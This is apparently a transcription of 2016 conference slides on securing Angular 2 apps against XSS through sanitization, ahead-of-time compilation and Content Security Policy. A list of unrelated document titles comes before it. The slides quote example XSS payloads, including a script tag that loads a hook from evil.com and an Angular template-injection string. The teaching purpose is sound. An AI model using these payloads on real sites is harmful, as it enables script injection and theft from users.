BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION

Similar documents
BOOSTING THE SECURITY

CSP ODDITIES. Michele Spagnuolo Lukas Weichselbaum

Content Security Policy

Web Security: Vulnerabilities & Attacks

MODERN WEB APPLICATION DEFENSES

We will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries

So we broke all CSPs. You won't guess what happened next!

Web Security IV: Cross-Site Attacks

Defense-in-depth techniques. for modern web applications

HTTP Security Headers Explained

Code-Reuse Attacks for the Web: Breaking XSS mitigations via Script Gadgets

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

Web Security: Vulnerabilities & Attacks

Browser code isolation

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

last time: command injection

Web basics: HTTP cookies

Content Security Policy

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Web basics: HTTP cookies

Trusted Types - W3C TPAC

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

The security of Mozilla Firefox s Extensions. Kristjan Krips

High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018

DID WE LOSE THE BATTLE FOR A SECURE WEB?

Northeastern University Systems Security Lab

Extending the browser to secure applications

Match the attack to its description:

Client Side Security And Testing Tools

CIS 4360 Secure Computer Systems XSS

Web Application Security

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Web Security, Part 2

CSC 405 Computer Security. Web Security

RKN 2015 Application Layer Short Summary

Project 3 Web Security Part 1. Outline

Client Side Injection on Web Applications

Angular 4 Syllabus. Module 1: Introduction. Module 2: AngularJS to Angular 4. Module 3: Introduction to Typescript

UI Course HTML: (Html, CSS, JavaScript, JQuery, Bootstrap, AngularJS) Introduction. The World Wide Web (WWW) and history of HTML

Web Security, Summer Term 2012

Web Security, Summer Term 2012

Sandboxing JavaScript. Lieven Desmet iminds-distrinet, KU Leuven OWASP BeNeLux Days 2012 (29/11/2012, Leuven) DistriNet

Riding out DOMsday: Toward Detecting and Preventing DOM Cross-Site Scripting. William Melicher Anupam Das Mahmood Sharif Lujo Bauer Limin Jia

The Evolution of Chrome Security Architecture. Huan Ren Director, Qihoo 360 Technology Ltd

CS 161 Computer Security

Common Websites Security Issues. Ziv Perry

Code Injection Attacks

Writing Secure Chrome Apps and Extensions

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

AN EVALUATION OF THE GOOGLE CHROME EXTENSION SECURITY ARCHITECTURE

CS 161 Computer Security

CS 142 Winter Session Management. Dan Boneh

Some Facts Web 2.0/Ajax Security

Code-Injection Attacks in Browsers Supporting Policies. Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

WEB SECURITY: XSS & CSRF

CSCE 548 Building Secure Software SQL Injection Attack

Analysis of Hypertext Isolation Techniques for Cross-site Scripting Prevention. Mike Ter Louw Prithvi Bisht V.N. Venkatakrishnan

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Manual Html A Href Onclick Submit Form

PHP Security. Kevin Schroeder Zend Technologies. Copyright 2007, Zend Technologies Inc.

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild

Modern client-side defenses. Deian Stefan

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Security. CSC309 TA: Sukwon Oh

Moving your website to HTTPS - HSTS, TLS, HPKP, CSP and friends

Know Your Own Risks: Content Security Policy Report Aggregation and Analysis

Portcullis Computer Security.

INJECTING SECURITY INTO WEB APPS WITH RUNTIME PATCHING AND CONTEXT LEARNING

ANGULAR 2.X,4.X + TYPESRCIPT by Sindhu

NoScript, CSP and ABE: When The Browser Is Not Your Enemy

CSCD 303 Essential Computer Security Fall 2018

Hacking Web Sites Cross Site Scripting

CSCD 303 Essential Computer Security Fall 2017

CodeValue. C ollege. Prerequisites: Basic knowledge of web development and especially JavaScript.

Django-CSP Documentation

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Full Stack Web Developer

MASTERS COURSE IN FULL STACK WEB APPLICATION DEVELOPMENT W W W. W E B S T A C K A C A D E M Y. C O M

Origin Policy Enforcement in Modern Browsers

Simple AngularJS thanks to Best Practices

Financial. AngularJS. AngularJS. Download Full Version :

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

Web 2.0 Attacks Explained

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

NET 311 INFORMATION SECURITY

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

Financial. AngularJS. AngularJS.

Getting Started with

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Web Security: Vulnerabilities & Attacks

CSCE 813 Internet Security Case Study II: XSS

EasyCrypt passes an independent security audit

Comprehensive AngularJS Programming (5 Days)

User Input Piercing For Cross-site Scripting Attacks OWASP 11/12/2009. The OWASP Foundation Matias Blanco

I n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:

Ten interesting features of Google s Angular Project

Lecture Notes on Safety and Information Flow on the Web: II

Unusual Web Bugs. A Web App Hacker s Bag O Tricks. Alex kuza55 K.

Transcription:

BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION Philippe De Ryck NG-BE Conference, December 9 th 2016 https://www.websec.be

ABOUT ME PHILIPPE DE RYCK My goal is to help you build secure web applications In-house training programs at various companies Hosted web security training courses at DistriNet (KU Leuven) Talks at various developer conferences Slides, videos and blog posts on https://www.websec.be I have a broad security expertise, with a focus on Web Security PhD in client-side web security Main author of the Primer on client-side web security Part of the organizing committee of SecAppDev.org Week-long course focused on practical security 2

XSS IS THE GATEWAY TO TOTAL PWNAGE http://colesec.inventedtheinternet.com/beef-the-browser-exploitation-framework-project/ 3

TO TALK ABOUT THE FUTURE, WE MUST TALK ABOUT THE PAST <p>welcome <b><?php echo $username?></b></p> https://websec.be/?username=philippe <p>welcome <b>philippe</b></p> Welcome Philippe https://websec.be/?username=<blink>ng-be</blink> <p>welcome <b><blink>ng-be</blink></b></p> Welcome ng-be https://websec.be/?username=pwned<script src=//evil.com/hook.js></script> <p>welcome <b>pwned<script src= //evil.com/hook.js ></script></b></p> Welcome pwned

TRADITIONAL XSS DEFENSES <p> Welcome <b><?php echo $username?></b> </p> <p> Welcome <b><?php echo htmlentities($username)?></b> </p> <p> Welcome <b><blink>ng-be</blink></b> </p> <script> var username = <?php echo $username?> ; </script> <p class= <?php echo $status?> > Welcome <b style= color: <?php echo $color?> ><?php echo $username?></b> </p>

DOESN T THIS LOOK FAMILIAR? https://xkcd.com/327/

SEPARATING DATA AND CODE WITH ANGULAR <p>welcome <b>{{username}}</b></p> https://websec.be/?username=<script>alert( ng-be! </script> <p>welcome <b><bscript>alert( ngbe! )</script></b></p> Welcome <script>alert( ng-be! </script> https://websec.be/?username=<blink>ng-be</blink> <p>welcome <b><blink>ngbe</blink></b></p> Welcome <blink>ng-be</blink>

BUT ANGULAR IS FLEXIBLE, AND ESCAPING IS NOT MANDATORY <p>welcome <b [innerhtml]= htmlsnippet ></b></p> htmlsnippet= <blink>ng-be</blink> <p>welcome <b><blink>ng-be</blink></b></p> Welcome ng-be htmlsnippet=pwned<script src= //evil.com/hook.js ></script> <p>welcome <b>pwned</b></p> Welcome pwned

RESPECT THE AUTHORITY OF THE SANITIZER Sanitization is enabled by default when you bind HTML into the DOM The majority of you will not even notice the sanitizer at work, which is great! Make sure you do this via Angular, not by directly calling the DOM API Similar to Angular 1, functions to bypass sanitization are available A minor modifications aims to raise developer awareness about its effect bypasssecuritytrusthtml() bypasssecuritytrustscript() bypasssecuritytruststyle() bypasssecuritytrusturl() bypasssecuritytrustresourceurl()

DISMISS XSS LIKE A KING, GET PWNED LIKE A SKIDDIE https://github.com/angular/angular/issues/8511 Redacted for your safety!

TAKEAWAY #1 ANGULAR ALREADY PROTECTS YOU AGAINST XSS, JUST GET OUT OF THE WAY The normal way of binding data is using interpolation Angular will automatically apply escaping Binding data this way will never result in the injection of unsafe content You can also bind data that contains HTML code Angular will automatically apply sanitization The sanitizer removes dangerous features, but leaves other parts untouched Do not directly use DOM APIs to bind this data, but use built-in mechanisms Angular allows you to mark a value as safe to use in a dangerous context Only use this for static data, which has been verified to be secure

TRICKING ANGULAR INTO MISBEHAVING <script src= /angular.js ></script> <p>welcome <b><?php echo htmlentities($username)?></b></p> https://websec.be/?username=philippe{{constructor.constructor( alert(1) )}} <p>welcome <b>philippe {{constructor.constructor( alert(1) )}} </b></p> Welcome Philippe

THERE S NO SAFE WAY TO DO THIS WITH ANGULAR 1 http://angularjs.blogspot.be/2016/09/angular-16-expression-sandbox-removal.html

BUT ANGULAR 2 OFFERS AHEAD-OF-TIME COMPILATION The offline compiler turns the application into executable code The compiler is not even available anymore in the browser Data bindings are already resolved, and encoded into the JS bundle var currval_6 = WEBPACK_IMPORTED_MODULE_2 angular_core_src_linker_view_utils [" inlineinterpolate"](1, '\n ', this.context.myaotbinding, '\n'); AOT compilation effectively stops template injection attacks At the moment of injection, the application is already compiled The injected template code will simply be rendered, not executed

TAKEAWAY #2 USE AHEAD-OF-TIME COMPILATION TO GET RID OF TEMPLATE INJECTION Combining Angular with other technologies can result in template injection Dynamically generated server-side pages (PHP, JSP, ) Client-side libraries that run before Angular does (Jquery,...) This is actually a big problem in Angular 1.x applications The expression sandbox tried to fix this, but it turned out to be too hard to get right AOT allows you to compile your templates directly into the JS files Removes client-side processing of templates, thus removes injection attacks Additional incentive: AOT gives you a massive performance improvement

BUT WHAT WILL HAPPEN WHEN AN XSS SNEAKS THROUGH?

1-UPPING YOUR XSS DEFENSES WITH CSP Content Security Policy (CSP) is a new browser security policy Gives a developer a lot of control over what is allowed to happen in a page Delivered by the server in a response header or meta tag Content-Security-Policy: script-src self External scripts are only loaded if they are explicitly whitelisted <p>welcome <b>pwned<script src= //evil.com/hook.js ></script></b></p> Inline scripts are blocked and will not execute <p>welcome <b onclick= alert( XSS ) ><script>alert( XSS );</script></b></p>

CSP SOUNDS HARD, WILL IT WORK WITH ANGULAR? Content-Security-Policy: script-src self

WHITELISTING REMOTE SCRIPTS SEEMS EASY Content-Security-Policy: script-src self https://cdnjs.cloudflare.com

HOST-BASED WHITELISTING IS A BAD IDEA https://speakerdeck.com/mikispag/acm-ccs-2016-csp-is-dead-long-live-csp 20

NONCES TO THE RESCUE Content-Security-Policy: script-src self nonce-superrandom Nonces should fresh and random

NONCES WORK FOR INLINE SCRIPTS AS WELL Content-Security-Policy: script-src self nonce-superrandom Nonces should fresh and random

BUT INCLUDING REMOTE COMPONENTS REMAINS TRICKY Content-Security-Policy: script-src self nonce-superrandom https://platform.twitter.com/ https://cdn.syndication.twimg.com https://syndication.twitter.com

STRICT-DYNAMIC ENABLES TRUST PROPAGATION Content-Security-Policy: script-src self nonce-superrandom strict-dynamic

FROM STRICT-DYNAMIC TO A UNIVERSAL CSP POLICY Content-Security-Policy: object-src 'none'; script-src nonce-{random}' 'strict-dynamic' 'unsafe-inline' 'unsafe-eval' https: http:; report-uri https://your-report-collector.example.com/

FROM STRICT-DYNAMIC TO A UNIVERSAL CSP Content-Security-Policy: object-src 'none'; script-src nonce-{random}' 'strict-dynamic' 'unsafe-inline' 'unsafe-eval' https: http:; report-uri https://your-report-collector.example.com/ Remote Inline Remote Inline Remote Inline Content-Security-Policy: object-src 'none'; script-src nonce-{random} 'strict-dynamic 'unsafe-eval'; report-uri https://your-report-collector.example.com/ Content-Security-Policy: object-src 'none'; script-src nonce-{random} 'unsafe-eval' https: http:; report-uri https://your-report-collector.example.com/ Content-Security-Policy: object-src 'none'; script-src 'unsafe-inline' 'unsafe-eval' https: http:; report-uri https://your-report-collector.example.com/

TAKEAWAY #3 CSP ALLOWS YOU TO LOCK YOUR APPLICATION DOWN CSP allows you to prevent injected scripts from being executed Is straightforward to enable with full URLs on self-contained applications Has become easy to enable for external components using strict-dynamic The universal CSP policy is compatible with all browsers and virtually all applications CSPs reporting mode gives you insights into violations Awesome to dry-run a policy before actually deploying it CSP can be used to restrict other types of resources and actions New features keep being added, making CSP an important policy towards the future

BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION TAKEAWAY #1 ANGULAR ALREADY PROTECTS YOU AGAINST XSS, JUST GET OUT OF THE WAY TAKEAWAY #2 USE AHEAD-OF-TIME COMPILATION TO GET RID OF TEMPLATE INJECTION TAKEAWAY #3 CSP ALLOWS YOU TO LOCK YOUR APPLICATION DOWN

NOW IT S UP TO YOU Secure Follow Share https://www.websec.be philippe.deryck@cs.kuleuven.be /in/philippederyck

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback